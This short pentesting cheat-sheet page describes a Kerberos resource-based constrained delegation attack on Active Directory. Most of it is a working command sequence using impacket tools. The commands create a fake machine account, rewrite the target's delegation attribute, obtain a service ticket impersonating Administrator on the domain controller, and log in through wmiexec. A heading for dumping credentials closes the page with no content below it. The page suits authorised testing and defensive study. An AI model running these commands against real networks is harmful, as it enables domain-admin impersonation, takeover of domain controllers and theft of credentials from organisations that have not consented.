RBCD (Resource-Based Constrained Delegation) Attack
Last modified: 2024-09-10
Kerberos RBCD attack targets a domain computer, exactly service principals related to the target domain computer.
Exploit
Reference: https://github.com/tothi/rbcd-attack#abusing-kerberos-resource-based-constrained-delegation
0. Prerequisites
To achieve this attack successfully, we need the following conditions:
- A domain account who has permission to write the computer (
msDS-AllowedToActOnBehalfOfOtherIdentityproperty of the domain object). - A domain account who has permission to create a new computer.
- LDAP (389) and SAMR (445) or LDAPS (636) access to the DC.
- Kerberos (88) access to the DC.
1. Create Fake Computer
impacket-addcomputer -computer-name 'FAKECOMPUTER$' -computer-pass 'password123' -dc-ip 10.0.0.1 'example.local/username:password'
2. Modify Delegation Rights
We can use rbcd.py for abusing msDS-AllowedToActOnBehalfOfOtherIdentity property of the target.
impacket-rbcd -delegate-from 'FAKECOMPUTER$' -delegate-to 'DC$' -dc-ip 10.0.0.1 -action 'write' 'example.local/username:password'
3. Get the Impersonated Service Ticket
Impersonated service tickets may allow high-level access to services on the target like CIFS (Common Internet File System), HTTPs, etc.
impacket-getST -spn 'cifs/dc.example.local' -impersonate Administrator -dc-ip 10.0.0.1 'example.local/FAKECOMPUTER$:password123'
# or
impacket-getST -spn 'ldap/dc.example.local' -impersonate Administrator -dc-ip 10.0.0.1 'example.local/FAKECOMPUTER$:password123'
4. Use the Service Ticket
After getting the service ticket, we can use it for further pentesting.
Before doing that, we need to add the environment variable as below:
export KRB5CCNAME=`pwd`/admin.ccache
# Check by listing tickets.
# If the klist command not found, install it by `apt install krb5-user`
klist
-
Login to Services with Kerberos Auth
# -k: Use Kerberos Auth # -no-pass: No password impacket-wmiexec example.local/Administrator@example.local -k -no-pass -
Dump credentials